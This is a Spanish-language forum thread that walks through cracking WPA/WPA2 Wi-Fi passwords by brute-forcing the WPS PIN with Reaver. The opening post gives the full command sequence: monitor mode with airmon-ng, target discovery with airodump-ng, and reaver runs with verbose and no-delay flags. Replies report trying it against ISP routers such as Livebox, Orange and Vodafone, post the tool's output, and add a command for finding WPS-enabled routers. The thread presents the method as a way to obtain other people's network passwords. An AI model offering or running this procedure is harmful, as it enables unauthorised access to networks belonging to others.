Imagen


Por fin algo concreto para redes protegidas con WPA/WPA2
Que hay en este caso ?
Pues bien, se encontó una vulnerabilidad que permite explotar las redes seteadas con WPS mediante la cual podemos obtener esas contraseña que tanto buscamos...

El promedio de la duracion del ataque es de 4-10 hs, dependiendo del AP.

La mayoria de los dispositivos (incluidos Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL y
Technicolor) tienen dispositivos con certificacion WPS,otros (como TP-Link) "tienen soporte WPS, aunque no están certificados" (sic)

Pero que es WPS ?
WPS (Wi-Fi Protected Setup) es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. En otras palabras, WPS no es un mecanismo de seguridad por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas (SOHO). Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación.
Hace poco se podian encontrar este tipo de notas ( Ahora la tienen Adentro :) ):

Mostrar/Ocultar

Comienza el ataque:
Ponemos la tarjeta de red en modo monitor
# airmon-ng start wlan0

Buscamos la red:
# airodump-ng mon0

Especificamos el BSSID del Access Point :
# reaver -i mon0 -b 00:01:02:03:04:05
o
Si que queremos ver detalladamente el proceso del ataque (lo ponemos en modo "verbose")
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
o
Apuramos el ataque:
Por default, Reaver tiene un delay de 1 segundo entre pins, de puede desactivar esto agregando '-d 0' pero no funciona esta opcion en algunos AP's:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

1.2:
[Enlace externo eliminado para invitados]
1.3:
[Enlace externo eliminado para invitados]

[Enlace externo eliminado para invitados]

[Enlace externo eliminado para invitados]

Drivers Soportados (segun los primeros testeos):

ath5k
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
b43
rt73usb
iwlagn

[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
Imagen
Muchas gracias bro! Siempre aportando nuevas ideas, sin duda será muy útil
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
Muchas Gracias por compartir esta información, aunque se ve un poco tardado parece que tiene mas ìndice de posibilidad que sacar la clave por diccionarios. saludos
Imagen
Hola, gracias por la noticia. De momento lo he probado con 3 SSID distintos y no me ha funcionado.

Con Orange-XXXX consigue asociarse pero me lanza timeout todo el rato:

Mostrar/Ocultar

Con JAZZTEL_XXXX ni siquiera consigue asociarse:

Mostrar/Ocultar

Y con vodafoneXXXX mas de lo mismo...

Mostrar/Ocultar

Seguire haciendo pruebas. Saludos.

¡Nunca quieras remediar entuertos!
¡nunca sigas impulsos compasivos!
¡ten los garfios del Odio siempre activos, los ojos del juez siempre despiertos!
¡Y al echarte en la caja de los muertos, menosprecia los llantos de los vivos!
Ahora lo he intentado con otra Orange-XXXX que estaba mas cerca y se asocia, comienza el ataque y va todo bien hasta que a los 30 segundos me suelta:

Código: Seleccionar todo

[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
Parece que los Livebox tienen proteccion contra ese tipo de ataque. Sigo haciendo pruebas...

¡Nunca quieras remediar entuertos!
¡nunca sigas impulsos compasivos!
¡ten los garfios del Odio siempre activos, los ojos del juez siempre despiertos!
¡Y al echarte en la caja de los muertos, menosprecia los llantos de los vivos!
Los livebox por lo que se ve si, todo el rato me sale esto

[!] WARNING: Failed to associate with 00:1C:26:6E:C3:E2 (ESSID: Livebox-5780)
[!] WARNING: Failed to associate with 00:1C:26:6E:C3:E2 (ESSID: Livebox-5780)

y varias lineas con wpa no me salen cuando ago airodump..
Gracias por toda la info. enorme
Sudafrica 2010
################################
################################
################################
################################
Para evitaros comeduras de cabeza probando, el reaver incorpora una herramienta para comprobar que routeres tienen habilitado el WPS
Tan solo escribir en la consola:

walsh -i mon0 -C

(mon0 es tu adaptador)
Un saludo!
Ahora mismo voy al lio que estoy en backtrack. Voy a excitar a mi rtl8187

Pruebo con Vodafone_XX y comento.

Gracias osni (L)
Soy un camaleón, en tu cama, leona ♪
Responder

Volver a “Seguridad Wireless”